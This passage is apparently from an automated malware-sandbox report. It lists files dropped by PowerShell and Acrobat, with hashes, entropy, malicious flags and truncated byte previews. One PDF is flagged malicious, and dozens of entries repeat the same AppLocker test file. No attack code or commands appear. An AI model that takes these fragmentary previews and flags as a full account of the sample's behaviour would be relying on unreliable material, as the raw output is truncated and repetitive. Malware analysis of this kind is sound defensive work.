                                                                                                      SSDEEP:384:o1VoGIpN6KQkj2xkjh4iUxOhQMrardFnAjOdBktAHkQNXp5JoNSSmezvOjJMYorP:o1V3IpNBQkj2gh4iUxOhBrardFnAjOdw
                                                                                                      MD5:AC5FBCCEAE82826479EE0686BD23F9AF
                                                                                                      SHA1:71044516D3E8B403D0C2B4F069E6823991AD6906
                                                                                                      SHA-256:9C476CC5B16CEA3F65BC3A0429A79B19EBAA8E6F1FF2688E3E905A8FAA2D4392
                                                                                                      SHA-512:82A3B4216A11E590E9F678137019C1C5C720A500DECFE655C020C40852295B5F7282431B6B7E93F24AD285A029C8F0011650B2363BE5F2C060509ECCDEFF5726
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......)..z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........4W.>...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........4..z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........................................................
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):246
                                                                                                      Entropy (8bit):3.5178552411299933
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+2clMH:Qw946cPbiOxDlbYnuRKGV
                                                                                                      MD5:969EFC56A1110B02E59121122221CB80
                                                                                                      SHA1:5AE2E43A903370EF7639AA7E1FF570B3D8E3CF17
                                                                                                      SHA-256:A4EC59AF2D8AD61A30A21A53ED54BE9FCBE487949A9D32D5D7649911723592CA
                                                                                                      SHA-512:995D669FC3A0762DEB8DDCB14F47FC0506D029AE56A9DC9965B972D12E093C620B3526E8BA81CA8D7579D948B92E8ED01849731E0896401A21CAD2ECB64746C8
                                                                                                      Malicious:false
                                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.0.2./.2.0.2.4. . .0.6.:.2.8.:.1.1. .=.=.=.....
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PDF document, version 1.4, 3 pages
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1242540
                                                                                                      Entropy (8bit):7.581208616863217
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:ibUNW79oi/Gs+zxXRzuTi/izQzdIMXRi8XRVw6Ji3XRbFjuXRtXRj+RjCT7r:yUhXRzuUizQzbXRi8XRVnJi3XRbluXRJ
                                                                                                      MD5:C2FA5BCE418008580CFFA180FB8448EF
                                                                                                      SHA1:432B0276F1ED1C1E3F7DAE2208D326EC5D62568B
                                                                                                      SHA-256:B2CD9ABF8F41D21F52AD470348B5978567537E52047F4446CB77EF3E84F2A10A
                                                                                                      SHA-512:BC6518A121E58C3639434D9B751017733E7780527FC29BF32BD85200BD4EBA13E8505FC9709234CDB51970C9FD218589C12CA3F6AB0F1ABBA063BDEFAAE6755A
                                                                                                      Malicious:true
                                                                                                      Preview:%PDF-1.4.%.....1 0 obj.<<./Type /Catalog./Version /1.7./Pages 2 0 R./Metadata 3 0 R.>>.endobj.4 0 obj.<<./Creator (PDF24)./Producer (PDF24)./CreationDate (D:20230428133420+00'00').>>.endobj.2 0 obj.<<./Type /Pages./Kids [5 0 R 6 0 R 7 0 R]./Count 3.>>.endobj.3 0 obj.<<./Length 4128./Subtype /XML./Type /Metadata.>>.stream..<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.425dc87, 2021/10/27-16:20:32 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:pdf="http://ns.adobe.com/pdf/1.3/">. <xmp:ModifyDate>2023-04-28T08:57:23-04:00</xmp:ModifyDate>. <xmp:CreateDate>2023-04-28T08:51:
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
